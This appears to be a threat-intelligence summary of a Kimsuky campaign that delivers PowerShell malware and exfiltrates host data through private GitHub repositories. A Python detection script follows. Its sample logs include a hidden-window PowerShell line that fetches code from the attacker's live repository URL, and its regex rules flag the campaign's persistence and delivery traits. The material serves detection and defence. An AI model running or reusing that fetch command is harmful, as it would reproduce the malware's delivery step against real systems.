Kimsuky’s Use of GitHub for Malware Delivery and Exfiltration
2025-09-09 • S2W
S2W TALON identified ongoing Kimsuky activity that abuses private GitHub repositories to deliver and manage PowerShell malware.

The infection begins with a ZIP archive containing an LNK file disguised as an electronic tax invoice. Opening the LNK launches PowerShell, which downloads a decoy document and additional scripts from hxxps://github[.]com/God0808RAMA/group_0721/ using a hardcoded GitHub private token.

The downloaded scripts establish persistence through MicrosoftEdgeUpdate.ps1 and a scheduled task named BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}, then repeatedly fetch and execute updated payloads from the repository.

The first-stage script collects the IP address, system and OS details, install date, running processes, and boot-time information, and uploads the resulting logs into attacker-controlled GitHub folders named after a timestamp, such as ntxBill_{MMdd_HHmm}.

Analysis of the repositories exposed nine related private repositories and the email address sahiwalsuzuki4[@]gmail.com, underscoring Kimsuky’s continued use of trusted developer infrastructure for both malware delivery and data exfiltration.
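As an added example (not part of the S2W report), the following Python rules scan process-creation and scheduled-task log lines for the traits described above: the braced suffix on a task name that otherwise mimics a built-in BitLocker task, a PowerShell action running a file named MicrosoftEdgeUpdate.ps1, a download from the named repository, and a GitHub token embedded in a command line. The log format, the benign lines, and the placeholder token are constructed for the demonstration; only the repository path, task name and script name come from the report.

```python
import re
from typing import Dict, List

# Constructed sample log lines (not from the report), modelled on the chain described above.
# 0: LNK-launched PowerShell stage fetching from the repository named in the report (token is a placeholder).
# 1: the persistence task; its name mimics a built-in BitLocker task but carries a braced suffix.
# 2: benign task with the genuine Windows task name (no brace suffix, no PowerShell action).
# 3: benign PowerShell launched by a service.
SAMPLE_LOGS = [
    'EventID=4688 Parent=explorer.exe Image=powershell.exe CommandLine="powershell -w hidden '
    '-c $t=\'ghp_EXAMPLEPLACEHOLDER000000000000000000\'; iwr https://github.com/God0808RAMA/group_0721/"',
    'EventID=4698 TaskName="\\BitLocker MDM policy Refresh{DBHDFE12-496SDF-Q48D-SDEF-1865BCAD7E00}" '
    'Action="powershell.exe -File C:\\Users\\Public\\MicrosoftEdgeUpdate.ps1"',
    'EventID=4698 TaskName="\\Microsoft\\Windows\\BitLocker\\BitLocker MDM policy Refresh" '
    'Action="%SystemRoot%\\System32\\BitLockerWizard.exe"',
    'EventID=4688 Parent=svchost.exe Image=powershell.exe CommandLine="powershell -File C:\\ProgramData\\Vendor\\maint.ps1"',
]

# Rule name -> compiled regex. Every rule whose pattern matches a line is reported for that line.
RULES = {
    # The genuine Windows task of this name has no braced GUID-like suffix.
    "spoofed_bitlocker_task": re.compile(r"BitLocker MDM policy Refresh\{[^}]+\}"),
    # The real Edge updater is an .exe; a .ps1 of this name run by PowerShell is the report's persistence script.
    "edgeupdate_ps1_persistence": re.compile(r'(?i)powershell[^"]*MicrosoftEdgeUpdate\.ps1'),
    # Download from the repository named in the report.
    "kimsuky_github_repo": re.compile(r"github\.com/God0808RAMA/group_0721"),
    # Any GitHub token embedded in a command line (classic ghp_ or fine-grained github_pat_ prefix).
    "hardcoded_github_token": re.compile(r"\b(?:ghp_[A-Za-z0-9]{20,}|github_pat_[A-Za-z0-9_]{20,})"),
    # Lure shape: PowerShell spawned from the shell with a hidden window.
    "hidden_powershell_from_explorer": re.compile(r'Parent=explorer\.exe .*powershell[^"]*-w(?:indowstyle)? hidden'),
}


def scan_logs(lines: List[str]) -> List[Dict[str, object]]:
    """Return one hit per line that triggers at least one rule, listing rule names in RULES order."""
    hits: List[Dict[str, object]] = []
    for idx, line in enumerate(lines):
        matched = [name for name, rx in RULES.items() if rx.search(line)]
        if matched:
            hits.append({"line": idx, "rules": matched})
    return hits


if __name__ == "__main__":
    for hit in scan_logs(SAMPLE_LOGS):
        print(hit["line"], ", ".join(hit["rules"]))
```

The benign BitLocker task line is included deliberately: matching on the task name alone would alert on the legitimate task, so the rule keys on the braced suffix.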